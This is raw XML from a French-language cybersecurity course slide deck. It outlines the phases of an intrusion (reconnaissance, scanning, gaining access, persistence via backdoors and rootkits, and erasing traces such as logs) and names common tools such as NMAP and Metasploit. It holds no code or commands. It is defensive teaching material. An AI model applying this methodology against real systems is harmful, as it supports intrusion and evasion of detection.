            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>… etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>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11</a:t>
            </a:fld>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928379"/>
            <a:ext cx="4333333" cy="4304762"/>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4242" y="4257202"/>
            <a:ext cx="1016206" cy="1185656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>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413172" y="2394528"/>
            <a:ext cx="1006899" cy="1078119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1493317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smtClean="0"/>
              <a:t>Méthodologie d’une attaque (Phases principales)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="5839098" cy="5453534"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>méthodologie généralement retenue par les pirates pour s’introduire dans un système informatique.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Autres cadres de méthodologie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Kill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>MITRE ATT&amp;CK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Diagramme 9"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4029588849"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4985657" y="587830"/>
          <a:ext cx="7206343" cy="5573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8299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smtClean="0"/>
              <a:t>Méthodologie d’une attaque (Phases principales)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="11684728" cy="5758334"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phase 1 : Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>C'est la phase où l'attaquant collecte toutes les informations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>possibles (techniques, humaines) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de la cible de manière passive ou active. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Récolte passive :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> sans interroger directement le système ciblé.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Moteur de recherche </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Base de données (Whois …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Réseaux sociaux (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Clients, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Employés …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Récolte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>active: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>interroger directement le système </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>ciblé. Toutes les techniques qui permettent de récupérer les adresses IP et les services utilisées</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exemple d’outil : NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Hping</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1350146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smtClean="0"/>
              <a:t>Méthodologie d’une attaque (Phases principales)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="11684728" cy="5758334"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phase 2 : Scanning (identification des vulnérabilités)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ce processus implique une enquête approfondie. Le processus d'analyse aide l'attaquant à analyser le réseau ou la machine cible pour rechercher les vulnérabilités pouvant être exploitées. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Trois étapes importantes :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Phase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>préattaque : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le pirate analyse le réseau à la recherche d'informations spécifiques basées sur les informations recueillies lors de la reconnaissance.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Scanning de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>ports : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cette phase implique l'analyse de la cible pour les informations telles que les ports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>ouverts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Extraction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>d'informations : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Au cours de cette étape, le pirate collecte des informations sur les ports, les machines en direct et les détails du système d'exploitation, la topologie du réseau, les routeurs, les pare-feu et les serveurs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exemple d’outil : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Nexpose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Nessus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>NMAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18009694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smtClean="0"/>
              <a:t>Méthodologie d’une attaque (Phases principales)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="11684728" cy="5758334"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phase 3 : Gain d’accès</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>À ce stade, le pirate dispose des informations dont il a besoin. Donc, il conçoit d'abord la carte du réseau, puis il doit décider comment mener l'attaque ? Il existe de nombreuses options, par exemple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Man in the middle attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute Force Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoofing Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dos attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exemple d’outil : Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quoi qu'il en soit, un pirate après être entré dans un système, il doit augmenter son privilège au niveau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>administrateur (Escalade de privilège) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>afin qu'il puisse installer une application dont il a besoin ou modifier des données ou masquer des données.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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15</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18464754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smtClean="0"/>
              <a:t>Méthodologie d’une attaque (Phases principales)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="11684728" cy="5758334"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phase 4 : Maintien d’accès</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>C'est la phase où les pirates ont déjà eu accès au système ciblé. Le pirate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>essaie de maintenir l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>acces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> pour achever  le but de l’attaque. Pour maintenir cet accès le pirate peut : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Escalade de privilèges : augmenter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>son privilège au niveau administrateur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>afin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>qu'il puisse installer une application dont il a besoin ou modifier des données ou masquer des données</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>installera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>portes dérobées </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>dans le système ciblé afin qu'il puisse facilement accéder au système à l'avenir. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>installer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> au niveau du noyau pour obtenir un accès administrateur complet à l'ordinateur cible.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exemple d’outil : Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>est l'outil le plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>utilisé.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="796715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smtClean="0"/>
              <a:t>Méthodologie d’une attaque (Phases principales)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="11684728" cy="5758334"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phase 5 : Effacement des traces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un pirate informatique intelligent efface toujours toutes les preuves afin que plus tard, personne ne trouve de traces menant à lui. Il/elle le fait en : </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Vider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>le cache et les cookies </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Modification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>des valeurs de registre </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Modifier/corrompre/supprimer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>les valeurs des Logs </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Effacement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>des e-mails envoyés </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Fermeture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de tous les ports ouverts </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Désinstaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>toutes les applications qu'il utilise</a:t>
            </a:r>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6501635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smtClean="0"/>
              <a:t>Classification des attaques</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagram 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="608708165"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="288925" y="806450"/>
          <a:ext cx="11685588" cy="5757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4845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a:t>Classification des attaques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="6067699" cy="2579705"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon la localisation de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’attaquant</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19</a:t>
